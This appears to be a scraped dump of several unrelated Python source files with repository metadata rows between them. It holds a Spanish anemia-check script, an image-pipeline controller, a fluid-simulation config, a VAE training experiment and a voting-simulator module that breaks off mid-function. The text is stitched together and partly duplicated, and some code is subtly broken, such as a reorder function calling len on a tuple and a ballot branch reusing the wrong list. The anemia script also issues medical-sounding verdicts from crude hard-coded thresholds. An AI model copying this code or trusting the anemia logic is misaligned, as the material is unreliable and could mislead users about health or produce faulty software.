if (nivel_hemoglobina>=13 and nivel_hemoglobina<=26) and(edad_paciente>=0 and edad_paciente<=1):
resultado=(" El resultado es Negativo")
elif(nivel_hemoglobina>=10 and nivel_hemoglobina<=18)and(edad_paciente>1 and edad_paciente<=6):
resultado=(" El resultado es Negativo")
elif(nivel_hemoglobina>=11 and nivel_hemoglobina<=15)and(edad_paciente>6 and edad_paciente<=12):
resultado=(" El resultado es Negativo")
elif (nivel_hemoglobina>=11.5 and nivel_hemoglobina<=15) and (edad_paciente>12 and edad_paciente<=60): # Equivalencia entre 1 año y 5 años en meses
resultado=(" El resultado es Negativo")
elif (nivel_hemoglobina>=12.6 and nivel_hemoglobina<=15.5) and (edad_paciente>60 and edad_paciente<=120): # Equivalencia entre 5 años y 10 años en meses
resultado=(" El resultado es Negativo")
elif (nivel_hemoglobina>=13 and nivel_hemoglobina<=15.5) and(edad_paciente>120 and edad_paciente<=180): # Equivalencia entre 10 año y 15 años en meses
resultado=(" El resultado es Negativo")
elif (nivel_hemoglobina>=12 and nivel_hemoglobina<=16 ) and (edad_paciente>180 and sexo=="F"): # Equivalencia de 15 a meses
resultado=(" El resultado es Negativo")
elif (nivel_hemoglobina>=14 and nivel_hemoglobina<=18) and (edad_paciente>180 and sexo=="M"): # Equivalencia de 15
resultado=(" El resultado es Negativo")
else:
resultado= "El resultado es positivo"
#Salidas
print(resultado)
| 39.346154 | 153 | 0.747312 | """
Datos de entrada
edad del paciente = edad = int
sexo del paciente = sexo_paciente = int
Datos de salida
Resultado positivo o negativo acerca de si el paciente tiene anemia = resultado = str
"""
# Entradas
edad_paciente=int(input("Inserte la edad del paciente en su equivalente de años a meses "))
sexo_paciente=str(input("Inserte su sexo de la siguiente manera , femenino (F) o masculino (M) "))
nivel_hemoglobina=float(input("Inserte cual fue el resultado del nivel de hemoglobina en la sangre "))
sexo= sexo_paciente[0] # Es la posicion del caracter que quiero que tome
# Caja Negra
resultado=''
if (nivel_hemoglobina>=13 and nivel_hemoglobina<=26) and(edad_paciente>=0 and edad_paciente<=1):
resultado=(" El resultado es Negativo")
elif(nivel_hemoglobina>=10 and nivel_hemoglobina<=18)and(edad_paciente>1 and edad_paciente<=6):
resultado=(" El resultado es Negativo")
elif(nivel_hemoglobina>=11 and nivel_hemoglobina<=15)and(edad_paciente>6 and edad_paciente<=12):
resultado=(" El resultado es Negativo")
elif (nivel_hemoglobina>=11.5 and nivel_hemoglobina<=15) and (edad_paciente>12 and edad_paciente<=60): # Equivalencia entre 1 año y 5 años en meses
resultado=(" El resultado es Negativo")
elif (nivel_hemoglobina>=12.6 and nivel_hemoglobina<=15.5) and (edad_paciente>60 and edad_paciente<=120): # Equivalencia entre 5 años y 10 años en meses
resultado=(" El resultado es Negativo")
elif (nivel_hemoglobina>=13 and nivel_hemoglobina<=15.5) and(edad_paciente>120 and edad_paciente<=180): # Equivalencia entre 10 año y 15 años en meses
resultado=(" El resultado es Negativo")
elif (nivel_hemoglobina>=12 and nivel_hemoglobina<=16 ) and (edad_paciente>180 and sexo=="F"): # Equivalencia de 15 a meses
resultado=(" El resultado es Negativo")
elif (nivel_hemoglobina>=14 and nivel_hemoglobina<=18) and (edad_paciente>180 and sexo=="M"): # Equivalencia de 15
resultado=(" El resultado es Negativo")
else:
resultado= "El resultado es positivo"
#Salidas
print(resultado)
| 0 | 0 | 0 |
1aab9f57469dfa09590632b595dd434c94b550b5 | 4,350 | py | Python | core/controllers/image.py | zihbot/vision-line | 3718a51da7c3f5219da12a9a26cb7ebacafe9a2a | [
"MIT"
] | null | null | null | core/controllers/image.py | zihbot/vision-line | 3718a51da7c3f5219da12a9a26cb7ebacafe9a2a | [
"MIT"
] | null | null | null | core/controllers/image.py | zihbot/vision-line | 3718a51da7c3f5219da12a9a26cb7ebacafe9a2a | [
"MIT"
] | null | null | null | from collections import namedtuple
from repositories.lines import LineORM
import cv2
import logging
from function_factory import FunctionFactory
from api import models
import time
logger = logging.getLogger(__name__)
_Line=namedtuple('_Line', 'name last_change nodes')
lines: list[_Line] = [_Line(name='asd', last_change=1413534, nodes=[])]
| 30.208333 | 81 | 0.674253 | from collections import namedtuple
from repositories.lines import LineORM
import cv2
import logging
from function_factory import FunctionFactory
from api import models
import time
logger = logging.getLogger(__name__)
_Line=namedtuple('_Line', 'name last_change nodes')
lines: list[_Line] = [_Line(name='asd', last_change=1413534, nodes=[])]
def mapLineOrmToModel(orm: LineORM) -> models.Line:
return models.Line(orm.id, orm.name, len(orm.nodes), orm.last_change)
def mapLineModelToOrm(model: models.Line) -> LineORM:
orm = LineORM()
orm.id = model.id
orm.name = model.name
orm.nodes = []
orm.last_change = model.last_change
return orm
def post_create_image_bck(data: list[dict]) -> bytes:
img = cv2.imread('img.jpg')
print(type(img))
is_success, buffer_array = cv2.imencode('.jpg', img)
return buffer_array.tobytes()
def post_create_image(data: list[dict]) -> int:
logger.debug('post_create_image data=%s', data)
l = _Line(name='xxx', last_change=0, nodes=data)
lines.append(l)
return len(lines) - 1
def create_image_add(line_id: int, position: int, data: dict) -> int:
logger.debug('patch_create_image data=%s', data)
lines[line_id].nodes.insert(position, data)
return True
def create_image_edit(line_id: int, position: int, data: dict) -> int:
logger.debug('create_image_edit data=%s', data)
lines[line_id].nodes[position] = data
return True
def create_image_reorder(line_id: int, data: list[int]) -> int:
logger.debug('create_image_reorder data=%s', data)
if len(data) != len(lines[line_id]):
return False
lines[line_id].nodes = [lines[line_id][i] for i in data]
return True
def create_image_delete(line_id: int, position: int) -> int:
logger.debug('patch_create_image line_id=%s, position=%s', line_id, position)
lines[line_id].nodes.pop(position)
return True
def get_image(line_id: int, last_node_id: int = None) -> bytes:
logger.debug('get_image id=%s last_node=%s', line_id, last_node_id)
line = LineORM.find_by_id(line_id)
use_nodes: list = line.nodes[:]
if last_node_id is not None:
use_nodes = use_nodes[:last_node_id]
img_loc = cv2.imread('images/_default.jpg')
for node in use_nodes:
func = FunctionFactory.get_function(node['name'])
func.set_inputs(node['inputs'] if 'inputs' in node else {})
img_loc = func.run(img_loc)
is_success, buffer_array = cv2.imencode('.jpg', img_loc)
return buffer_array.tobytes()
def get_line(line_id: int) -> list[dict]:
return lines[line_id].nodes
def get_lines_node_numbers() -> list[dict]:
return [len(line.nodes) for line in lines]
def lines_to_model() -> list[models.Line]:
result: list[models.Line] = []
line: LineORM
for line in LineORM.query.all():
result.append(mapLineOrmToModel(line))
return result
def time_ms() -> int:
return time.time_ns() // (1000*1000)
def add_line(line: models.Line) -> models.Line:
orm = mapLineModelToOrm(line)
orm = orm.insert()
return mapLineOrmToModel(orm)
def delete_line(line_id: int) -> None:
orm = LineORM.find_by_id(line_id)
orm.delete()
def nodes_to_model(line_id: int) -> list[models.Node]:
result: list[models.Node] = []
for i, node in enumerate(LineORM.find_by_id(line_id).nodes):
result.append(models.Node(
id=i,
position=i,
name=node['name'],
inputs=node['inputs']
))
return result
def add_node(line_id: int, node: models.Node) -> None:
line = LineORM.find_by_id(line_id)
nodes: list = line.nodes[:]
n = {'name': node.name, 'inputs': node.inputs}
nodes.insert(node.position, n)
line.last_change = time_ms()
line.nodes = nodes
line.update()
def put_node(line_id: int, node_id: int, node: models.Node) -> None:
line = LineORM.find_by_id(line_id)
nodes: list = line.nodes[:]
nodes.pop(node_id)
n = {'name': node.name, 'inputs': node.inputs}
nodes.insert(node.position, n)
line.last_change = time_ms()
line.nodes = nodes
line.update()
def delete_node(line_id: int, node_id: int) -> None:
line = LineORM.find_by_id(line_id)
nodes: list = line.nodes[:]
nodes.pop(node_id)
line.last_change = time_ms()
line.nodes = nodes
line.update()
| 3,570 | 0 | 437 |
7decaa503e64ac854bcd7f073e2475e1fe4b741a | 159 | py | Python | config/config2D/scene_config/scene_jit2D.py | Jack12xl/a-toy-fluid-engine | 45ce4007ce6e804dcfdee8da307e131c9c3e7c7d | [
"MIT"
] | 21 | 2020-09-17T10:51:55.000Z | 2022-03-15T20:27:00.000Z | config/config2D/scene_config/scene_jit2D.py | Jack12xl/a-toy-fluid-engine | 45ce4007ce6e804dcfdee8da307e131c9c3e7c7d | [
"MIT"
] | 8 | 2020-09-18T08:52:34.000Z | 2021-02-07T09:27:49.000Z | config/config2D/scene_config/scene_jit2D.py | Jack12xl/myFluid | 45ce4007ce6e804dcfdee8da307e131c9c3e7c7d | [
"MIT"
] | 1 | 2020-09-20T11:10:35.000Z | 2020-09-20T11:10:35.000Z | import taichi as ti
import numpy as np
m_fluid_color = ti.Vector(list(np.random.rand(3) * 0.7 + 0.3))
m_dye_decay = 0.99
m_f_gravity = ti.Vector([0.0, -9.8]) | 22.714286 | 62 | 0.691824 | import taichi as ti
import numpy as np
m_fluid_color = ti.Vector(list(np.random.rand(3) * 0.7 + 0.3))
m_dye_decay = 0.99
m_f_gravity = ti.Vector([0.0, -9.8]) | 0 | 0 | 0 |
ad17f082f6fc9582bc3f0e858d696cbe52aa5dc5 | 11,427 | py | Python | experiment.py | ClaartjeBarkhof/PyTorch-VAE | a1ac49015c306b1cfc0d4d797669b17044f0a1eb | [
"Apache-2.0"
] | null | null | null | experiment.py | ClaartjeBarkhof/PyTorch-VAE | a1ac49015c306b1cfc0d4d797669b17044f0a1eb | [
"Apache-2.0"
] | null | null | null | experiment.py | ClaartjeBarkhof/PyTorch-VAE | a1ac49015c306b1cfc0d4d797669b17044f0a1eb | [
"Apache-2.0"
] | null | null | null | import os
import math
import torch
from torch import optim
from models import BaseVAE
from models.types_ import *
from utils import data_loader
import pytorch_lightning as pl
from torchvision import transforms
import torchvision.utils as vutils
from torchvision.datasets import CelebA
from torch.utils.data import DataLoader
import matplotlib.pyplot as plt
import numpy as np
# def sample_images(self):
# # Get sample reconstruction image
# test_input, test_label = next(iter(self.trainer.datamodule.test_dataloader()))
# test_input = test_input.to(self.curr_device)
# test_label = test_label.to(self.curr_device)
# # test_input, test_label = batch
# recons = self.model.generate(test_input, labels = test_label)
# vutils.save_image(recons.data,
# os.path.join(self.logger.log_dir ,
# "Reconstructions",
# f"recons_{self.logger.name}_Epoch_{self.current_epoch}.png"),
# normalize=True,
# nrow=12)
# try:
# samples = self.model.sample(144,
# self.curr_device,
# labels = test_label)
# vutils.save_image(samples.cpu().data,
# os.path.join(self.logger.log_dir ,
# "Samples",
# f"{self.logger.name}_Epoch_{self.current_epoch}.png"),
# normalize=True,
# nrow=12)
# except Warning:
# pass
| 41.857143 | 165 | 0.505032 | import os
import math
import torch
from torch import optim
from models import BaseVAE
from models.types_ import *
from utils import data_loader
import pytorch_lightning as pl
from torchvision import transforms
import torchvision.utils as vutils
from torchvision.datasets import CelebA
from torch.utils.data import DataLoader
import matplotlib.pyplot as plt
import numpy as np
class VAEXperiment(pl.LightningModule):
def __init__(self,
vae_model: BaseVAE,
params: dict) -> None:
super(VAEXperiment, self).__init__()
self.model = vae_model
self.params = params
self.curr_device = None
self.hold_graph = False
try:
self.hold_graph = self.params['retain_first_backpass']
except:
pass
def forward(self, input: Tensor, **kwargs) -> Tensor:
return self.model(input, **kwargs)
def training_step(self, batch, batch_idx, optimizer_idx=0):
real_img, labels = batch
self.curr_device = real_img.device
results = self.forward(real_img, labels=labels)
train_loss = self.model.loss_function(*results,
M_N=self.params['kld_weight'], # al_img.shape[0]/ self.num_train_imgs,
optimizer_idx=optimizer_idx,
batch_idx=batch_idx)
self.log_dict({key: val.item() for key, val in train_loss.items()}, sync_dist=True)
return train_loss['loss']
def validation_step(self, batch, batch_idx, optimizer_idx=0):
real_img, labels = batch
self.curr_device = real_img.device
results = self.forward(real_img, labels=labels)
val_loss = self.model.loss_function(*results,
M_N=1.0, # real_img.shape[0]/ self.num_val_imgs,
optimizer_idx=optimizer_idx,
batch_idx=batch_idx)
self.log_dict({f"val_{key}": val.item() for key, val in val_loss.items()}, sync_dist=True)
def on_validation_end(self) -> None:
self.sample_images()
# def sample_images(self):
# # Get sample reconstruction image
# test_input, test_label = next(iter(self.trainer.datamodule.test_dataloader()))
# test_input = test_input.to(self.curr_device)
# test_label = test_label.to(self.curr_device)
# # test_input, test_label = batch
# recons = self.model.generate(test_input, labels = test_label)
# vutils.save_image(recons.data,
# os.path.join(self.logger.log_dir ,
# "Reconstructions",
# f"recons_{self.logger.name}_Epoch_{self.current_epoch}.png"),
# normalize=True,
# nrow=12)
# try:
# samples = self.model.sample(144,
# self.curr_device,
# labels = test_label)
# vutils.save_image(samples.cpu().data,
# os.path.join(self.logger.log_dir ,
# "Samples",
# f"{self.logger.name}_Epoch_{self.current_epoch}.png"),
# normalize=True,
# nrow=12)
# except Warning:
# pass
def sample_images(self):
# print("New sample function!")
# # Get sample reconstruction image
# test_input, _ = next(iter(self.trainer.datamodule.test_dataloader()))
# test_input = test_input.to(self.curr_device)
# #print("test_input.shape", test_input.shape)
# batch_size = test_input.shape[0]
#
# n_channels = test_input.shape[1]
#
# # this function is called generate but it actually reconstructs
# recons = self.model.generate(test_input)
# self.model.train() # for the batch norm not to act out
# samples = self.model.sample(batch_size, self.curr_device)
# # print("recons.shape", recons.shape)
# # print("samples.shape", samples.shape)
# # print("recons min max", recons.min(), recons.max())
# # print("samples min max", samples.min(), samples.max())
#
# if n_channels == 1:
# #print("N CHANNELS = 1")
# vutils.save_image(recons.data,
# os.path.join(self.logger.log_dir,
# "Reconstructions",
# f"recons_{self.logger.name}_Epoch_{self.current_epoch}.png"),
# normalize=False,
# nrow=12)
#
# vutils.save_image(samples.cpu().data,
# os.path.join(self.logger.log_dir,
# "Samples",
# f"{self.logger.name}_Epoch_{self.current_epoch}.png"),
# normalize=False,
# nrow=12)
# else:
# vutils.save_image(recons.data,
# os.path.join(self.logger.log_dir,
# "Reconstructions",
# f"recons_{self.logger.name}_Epoch_{self.current_epoch}.png"),
# normalize=True,
# value_range=(-1.0, 1.0),
# nrow=12)
#
#
# vutils.save_image(samples.cpu().data,
# os.path.join(self.logger.log_dir,
# "Samples",
# f"{self.logger.name}_Epoch_{self.current_epoch}.png"),
# normalize=True,
# value_range=(-1.0, 1.0),
# nrow=12)
print("New sample function!")
test_input, _ = next(iter(self.trainer.datamodule.test_dataloader()))
test_input = test_input.to(self.curr_device)
B, C, W, H = test_input.shape
recons = self.model.generate(test_input).cpu() #.numpy()
self.model.train() # for the batch norm not to act out
samples = self.model.sample(B, self.curr_device).cpu() #.numpy()
# print("inital min max samples", samples.min(), samples.max())
# print("inital min max recons", recons.min(), recons.max())
# test_input = test_input.permute(0, 2, 3, 1)
# test_input = (test_input + 1) * (255 / 2)
# test_input = test_input.clamp(0, 255).to(torch.uint8).cpu().numpy()
#
# plt.imshow(test_input[0])
# plt.axis("off")
# plt.savefig(os.path.join(self.logger.log_dir, "Samples", f"TEST_INPUT_{self.logger.name}_Epoch_{self.current_epoch}.png"), dpi=200)
ncols = 12
nrows = int(np.ceil(B / ncols))
subplot_wh = 0.75
# Colour
if C == 3:
# Scale from -1, 1 to 0-1
#samples = (samples + 1.0) / 2.0
#recons = (recons + 1.0) / 2.0
#samples = np.transpose(samples, axes=(0, 2, 3, 1))
samples = samples.permute(0, 2, 3, 1)
#recons = np.transpose(recons, axes=(0, 2, 3, 1))
recons = recons.permute(0, 2, 3, 1)
samples = (samples + 1) * (255 / 2)
recons = (recons + 1) * (255 / 2)
samples = samples.clamp(0, 255).to(torch.uint8).cpu().numpy()
recons = recons.clamp(0, 255).to(torch.uint8).cpu().numpy()
# im = im.squeeze(0).permute(1, 2, 0)
# im = (im + 1) * (255 / 2)
# im = im.clamp(0, 255).to(torch.uint8).cpu().numpy()
# print("samples min max", samples.min(), samples.max())
# print("recons min max", recons.min(), recons.max())
#
# print("samples.shape", samples.shape)
# print("recons.shape", recons.shape)
# BW
else:
samples = samples.numpy()
recons = recons.numpy()
samples = np.transpose(samples, axes=(0, 2, 3, 1)).squeeze(-1)
recons = np.transpose(recons, axes=(0, 2, 3, 1)).squeeze(-1)
# Plot samples
fig, axs = plt.subplots(ncols=ncols, nrows=nrows, figsize=(ncols*subplot_wh, nrows*subplot_wh))
for im_idx in range(B):
c = im_idx % ncols
r = im_idx // ncols
if C == 1:
axs[r, c].imshow(samples[im_idx], cmap="Greys")
else:
axs[r, c].imshow(samples[im_idx])
axs[r, c].axis("off")
plt.subplots_adjust(wspace=0.1, hspace=0.1)
plt.tight_layout()
plt.savefig(os.path.join(self.logger.log_dir, "Samples", f"{self.logger.name}_Epoch_{self.current_epoch}.png"), dpi=75, bbox_inches = 'tight')
#plt.show()
# Plot reconstructions
fig, axs = plt.subplots(ncols=ncols, nrows=nrows, figsize=(ncols*subplot_wh, nrows*subplot_wh))
for im_idx in range(B):
c = im_idx % ncols
r = im_idx // ncols
if C == 1:
axs[r, c].imshow(recons[im_idx], cmap="Greys")
else:
axs[r, c].imshow(recons[im_idx])
axs[r, c].axis("off")
plt.subplots_adjust(wspace=0.1, hspace=0.1)
plt.tight_layout()
plt.savefig(os.path.join(self.logger.log_dir, "Reconstructions", f"recons_{self.logger.name}_Epoch_{self.current_epoch}.png"), dpi=75, bbox_inches = 'tight')
#plt.show()
def configure_optimizers(self):
optims = []
scheds = []
optimizer = optim.Adam(self.model.parameters(),
lr=self.params['LR'],
weight_decay=self.params['weight_decay'])
optims.append(optimizer)
# Check if more than 1 optimizer is required (Used for adversarial training)
try:
if self.params['LR_2'] is not None:
optimizer2 = optim.Adam(getattr(self.model, self.params['submodel']).parameters(),
lr=self.params['LR_2'])
optims.append(optimizer2)
except:
pass
try:
if self.params['scheduler_gamma'] is not None:
scheduler = optim.lr_scheduler.ExponentialLR(optims[0],
gamma=self.params['scheduler_gamma'])
scheds.append(scheduler)
# Check if another scheduler is required for the second optimizer
try:
if self.params['scheduler_gamma_2'] is not None:
scheduler2 = optim.lr_scheduler.ExponentialLR(optims[1],
gamma=self.params['scheduler_gamma_2'])
scheds.append(scheduler2)
except:
pass
return optims, scheds
except:
return optims | 9,386 | 18 | 212 |
f2402356296748d055dd98cf85fde7497edb18e5 | 51,002 | py | Python | voting-simulator/district.py | S8A/voting-simulator | c39a57b096472348e7be507820d42d4970b03276 | [
"MIT"
] | null | null | null | voting-simulator/district.py | S8A/voting-simulator | c39a57b096472348e7be507820d42d4970b03276 | [
"MIT"
] | null | null | null | voting-simulator/district.py | S8A/voting-simulator | c39a57b096472348e7be507820d42d4970b03276 | [
"MIT"
] | null | null | null | # coding=utf-8
"""A district is the voter population of a constituency or geographical area."""
import itertools as itls
import math as m
import random as rd
from .utils import generate_voter_groups, sort_dict_desc, make_table
from .candidate import Candidate
from .party import Party
from .voter_group import VoterGroup
from .result import ElectionResult
| 44.85664 | 81 | 0.598977 | # coding=utf-8
"""A district is the voter population of a constituency or geographical area."""
import itertools as itls
import math as m
import random as rd
from .utils import generate_voter_groups, sort_dict_desc, make_table
from .candidate import Candidate
from .party import Party
from .voter_group import VoterGroup
from .result import ElectionResult
class District:
def __init__(self, name, total_voters, voter_groups=[]):
"""Creates a voting district with the given number of voters.
Args:
name: Name of the district.
total_voters: Total number of voters in the district.
voter_groups: Optional list of voter groups to account for,
instead of generating all possible voter groups.
"""
self.name = name
self.total_voters = total_voters
self.voter_groups = voter_groups
self.voter_map = {}
self.generate_voter_map()
def __repr__(self):
"""Returns a string representation of the voting district."""
return f'{self.name} ({self.total_voters} voters)'
def summary(self):
"""Returns a summary of the district."""
summary = [f'{self} :.\n']
summary.extend(self.voter_map_table())
return '\n'.join(summary)
def voter_map_table(self):
"""Returns the voter map as a text table."""
widths = [50, 20, 10]
header = ['Voter group', 'Voters', 'Percent']
sorted_voter_groups = sort_dict_desc(self.voter_map)
body = [[vg, count, f'{100.0 * count / self.total_voters :.2f}%']
for vg, count in sorted_voter_groups]
return make_table(widths, header, body)
def generate_voter_map(self):
"""Generates a random map of voter groups to number of voters."""
# Use list of voter groups if given
voter_groups = self.voter_groups
# If not, generate all possible voter groups
if not voter_groups:
voter_groups = generate_voter_groups()
# Initialize voter map
voter_map = {vg: 0 for vg in voter_groups}
# Remaining number of voters to distribute
remaining = self.total_voters
# Maximum number of voters per group: 40% of total voters
max_voters = round(0.4 * self.total_voters)
# Fill voter map
for i, vg in enumerate(voter_groups):
if i == len(voter_groups) - 1:
# If this is the last voter group, assign remaining voters
voter_map[vg] = remaining
else:
# Otherwise, assign this voter group a random number of voters
# between zero and either the maximum number of voters per
# group or the number of remaining voters to distribute,
# whichever is bigger
voter_map[vg] = rd.randint(0, max(max_voters, remaining))
remaining -= voter_map[vg]
return voter_map
def generate_block_ballots(self, n, candidates, randomize):
"""Generates block voting ballots.
Each ballot must have exactly n candidates. Each voter group fills
their ballots with candidates of their preferred party, then from their
second preferred party, and so on as needed to fill their ballots. The
order of selection may be randomized or not.
Args:
n: Number of votes per ballot.
candidates: List of candidates. Assumed to be larger than n.
randomize: If true, the candidates of each party are shuffled
before selection when constructing the ballots.
Returns:
A list of tuples, containing each voter group's ballot and number
of voters. Each ballot is a list of candidates.
"""
ballots = []
# Fill ballots by voter group
for voter_group, voters in self.voter_map.items():
ballot = []
# Loop through each party in order of preference
for party in voter_group.preferences:
# Stop if there are no votes left
if len(ballot) >= n:
break
# Get party candidates and shuffle them if required
choices = [c for c in candidates if c.party == party]
if randomize:
rd.shuffle(choices)
# Add as many candidates as needed to try to fill the ballot
ballot.extend(choices[0:n])
# Add ballot to list
ballots.append((ballot, voters))
return ballots
def generate_ranked_ballots(self, n, candidates, randomize):
"""Generates a ranked ballot for each voter group.
Each ballot must rank exactly n candidates. Each voter group chooses
and ranks the candidates as follows: the first rank goes to a candidate
of their preferred party, the second rank goes to a candidate chosen at
random from any of their two most preferred parties, and so on until
the ballot is full.
Args:
n: Number of ranks per ballot.
candidates: List of candidates. Assumed to be larger than n.
randomize: If true, the selection of candidates is randomized on
each ballot.
Returns:
A list of tuples, containing each voter group's ballot and number
of voters. Each ballot is a list of candidates ranked in order of
preference.
"""
ballots = []
# Fill ballots by voter group
for voter_group, voters in self.voter_map.items():
ranked_ballot = []
# Add candidates to the ballot until it's full
for k in range(n):
# Select the first k+1 parties in order of preference
parties = voter_group.preferences[0:k+1]
# Extract a candidate from each party
# If randomize=True, choose at random
choices = []
for p in parties:
party_list = [c for c in candidates
if c.party == p and c not in ranked_ballot]
if randomize:
choices.append(rd.choice(party_list))
else:
choices.append(party_list[0])
# Select a candidate and add to ranking
candidate = rd.choice(choices) if randomize else choices[-1]
ranked_ballot.append(candidate)
# Add finished ballot to list
ballots.append((ranked_ballot, voters))
return ballots
def generate_score_ballots(self, n, candidates, min_score, max_score,
randomize):
"""Generates a score ballot for each voter group.
Each ballot must score exactly n candidates. Each voter group gives
the maximum score to a candidate of the party they most like, and the
minimum score to a candidate of the party they least like. Random
scores lower than the maximum are set for other candidates to fill
the ballot, but with higher probability of higher scores for candidates
of more preferred parties.
Because the scores of the intermediate candidates are always random,
this function does not guarantee reproducibility for n > 2 even if
randomize=False, which only affects the selection of the candidates.
Args:
n: Number of candidates per ballot. Assumed to be two or more.
candidates: List of candidates. Assumed to be larger than n.
min_score: Minimum score of the range.
max_score: Maximum score of the range. Assumed to be greater than
or equal to min_score.
randomize: If true, the selection of candidates is randomized on
each ballot.
Returns:
A list of tuples, containing each voter group's ballot and number
of voters. Each ballot is represented as a dictionary mapping
candidates to their corresponding score.
"""
ballots = []
# Fill ballots by voter group
for voter_group, voters in self.voter_map.items():
prefs = voter_group.preferences
scores = {}
# Add candidates to the ballot until it's full
for k in range(n):
if k == 0:
# Give highest score to a candidate from the voter group's
# most-preferred party (MPP)
mpp = [c for c in candidates if c.party == prefs[0]]
highest_scored = rd.choice(mpp) if randomize else mpp[0]
# Add to ballot
scores[highest_scored] = max_score
elif k == 1:
# Give lowest score to a candidate from the voter group's
# least-preferred party (LPP)
lpp = [c for c in candidates
if c.party == prefs[-1] and c not in scores.keys()]
lowest_scored = rd.choice(lpp) if randomize else mpp[0]
# Add to ballot
scores[lowest_scored] = min_score
else:
# Select the first k-1 parties in order of preference
# Using k-1 instead of k to account for last candidate
# already scored
parties = prefs[0:k-1]
# Extract a candidate from each party
# If randomize=True, choose at random
choices = []
for p in parties:
party_list = [
c for c in candidates
if c.party == p and c not in scores.keys()]
if randomize:
choices.append(rd.choice(party_list))
else:
choices.append(party_list[0])
# Select a candidate
candidate = rd.choice(choices) if randomize else choices[-1]
# Preference factor for the candidate's party
party_index = prefs.index(candidate.party)
pref_factor = 1 - (party_index / len(prefs))
# Choose a random score using a triangular distribution
# and the preference factor to vary the mode
mode = round(pref_factor * (max_score - 1))
score = rd.triangular(min_score, max_score - 1, mode)
# Add to ballot
scores[candidate] = score
# Add ballot to list
ballots.append((scores, voters))
return ballots
def simulate_ntv(self, n, seats, candidates, randomize=False):
"""Simulates a generic non-transferable vote system.
This function is a template for single non-transferable vote (SNTV),
first-past-the-post (FPTP), multiple non-transferable vote (MNTV), and
limited voting electoral systems.
This function doesn't account for tactical voting, which may have a
huge impact on real life uses of these voting systems.
Args:
n: Number of available votes per ballot.
seats: Number of seats to fill.
candidates: List of candidates.
randomize: Randomize selection or not.
Returns:
ElectionResult object containing the results of the electoral
process and other relevant information.
Raises:
NoSeatsToFillError: If there number of seats given is less than 1.
NotEnoughCandidatesError: If the list of candidates is too short.
"""
if seats < 1:
raise NoSeatsToFillError
if len(candidates) <= 1 or seats > len(candidates):
raise NotEnoughCandidatesError
# Generate block vote ballots
# Each voter group votes in order of party preference
ballots = self.generate_block_ballots(n, candidates, randomize)
# Count votes
counts = {c: 0 for c in candidates}
for ballot, votes in ballots:
for candidate in ballot:
counts[candidate] += votes
# The winners are chosen by vote count in descending order,
# until all seats are filled
winners = [c for c, v in sort_dict_desc(counts)[0:seats]]
# Prepare result
name = 'Non-transferable vote (NTV)'
details = [f'{n} votes per ballot',
f'{seats} seats',
f'{len(candidates)} candidates']
if randomize:
details.append('Randomized ballot generation')
result = ElectionResult(name, counts, winners, details=details)
return result
def simulate_sntv(self, seats, candidates, randomize=False):
"""Simulates single non-transferable vote or multi-member plurality.
SNTV is a plurality voting system for multiple seat elections. Each
voter votes for a single candidate. If there are n seats to fill,
the n candidates with the most votes win.
This function doesn't account for tactical voting, which may have a
huge impact on real life uses of this voting system.
Args:
seats: Number of seats to fill.
candidates: List of candidates.
randomize: Randomize candidate selection or not.
Returns:
ElectionResult object containing the results of the electoral
process and other relevant information.
Raises:
NoSeatsToFillError: If there number of seats given is less than 1.
NotEnoughCandidatesError: If the list of candidates is too short.
"""
# Get result: multiple-seat, single-vote NTV
result = self.simulate_ntv(1, seats, candidates, randomize=randomize)
# Change name
result.voting_system = 'Single non-transferable vote (SNTV)'
# Remove votes per ballot line
del result.details[0]
return result
def simulate_fptp(self, candidates, randomize=False):
"""Simulates first-past-the-post voting or single-member plurality.
FPTP is a plurality voting system for single seat elections. It's a
single-seat version of SNTV: each voter votes for a single candidate,
and then the candidate with the most votes in total wins.
This function doesn't account for tactical voting, which may have a
huge impact on real life uses of this voting system.
Args:
candidates: List of candidates.
randomize: Randomize selection or not.
Returns:
ElectionResult object containing the results of the electoral
process and other relevant information.
Raises:
NotEnoughCandidatesError: If the list of candidates is too short.
"""
# Get result: single-seat SNTV
result = self.simulate_sntv(1, candidates)
# Change name
result.voting_system = 'First-past-the-post (FPTP)'
# Remove number of seats line
del result.details[0]
return result
def simulate_mntv(self, seats, candidates, randomize=False):
"""Simulates multiple non-transferable vote or block vote.
MNTV is a plurality voting system for multiple seat elections. If
there are n seats to fill, each voter selects up to n candidates, and
then the n candidates with the most votes win.
This function doesn't account for tactical voting, which may have a
huge impact on real life uses of this voting system.
Args:
seats: Number of seats to fill.
candidates: List of candidates.
randomize: Randomize selection or not.
Returns:
ElectionResult object containing the results of the electoral
process and other relevant information.
Raises:
NoSeatsToFillError: If there number of seats given is less than 1.
NotEnoughCandidatesError: If the list of candidates is too short.
"""
# Get result: multiple-seat, multiple-vote NTV
result = self.simulate_ntv(seats, seats, candidates, randomize=randomize)
# Change name
result.voting_system = 'Multiple non-transferable vote (MNTV)'
return result
def simulate_limited_voting(self, seats, candidates, randomize=False):
"""Simulates limited voting.
Limited voting is a plurality voting system for multiple seat
elections. Voters have fewer votes than there are seats available, and
then the candidates with the most votes win those seats.
This function doesn't account for tactical voting, which may have a
huge impact on real life uses of this voting system.
In this implementation, the number of votes per ballot is set to
be a random number between 5 and 10, but never exceeding the number
of seats to fill minus one.
Args:
seats: Number of seats to fill.
candidates: List of candidates.
randomize: Randomize selection or not.
Returns:
ElectionResult object containing the results of the electoral
process and other relevant information.
Raises:
NoSeatsToFillError: If there number of seats given is less than 1.
NotEnoughCandidatesError: If the list of candidates is too short.
"""
# Number of votes per ballot
n = min(rd.randint(5, 10), seats - 1)
# Get result: multiple-seat, fewer-votes-than-seats NTV
result = self.simulate_ntv(n, seats, candidates, randomize=randomize)
# Change name
result.voting_system = 'Limited voting'
return result
def simulate_trs(self, candidates, randomize=False):
"""Simulates two-round system or runoff voting.
TRS is a two-round majority voting system for single seat elections.
Each voter votes for a single candidate. If any candidate gets a
majority of votes on the first round, she's the winner. Otherwise,
the two candidates with the most votes move on to the second round.
The voters vote again, and the winner is the candidate with the most
votes (which must be a majority, because they're only two).
This implementation makes each voter group vote for a candidate of
their preferred party on the first round, and the candidate they prefer
the most on the second round. Tactical voting in this system is a lot
less intense than in FPTP, but it still exists in real life and it's
not accounted for by this function. This function also assumes that
each voter group's preferences remain the same between voting rounds,
making it equivalent to a contingent vote system.
Args:
candidates: List of candidates.
randomize: Randomize selection or not.
Returns:
ElectionResult object containing the results of the electoral
process and other relevant information.
Raises:
NotEnoughCandidatesError: If the list of candidates is too short.
"""
if len(candidates) <= 1:
raise NotEnoughCandidatesError
# Generate single vote ballots
# Each voter group votes in order of party preference
ballots = self.generate_block_ballots(1, candidates, randomize)
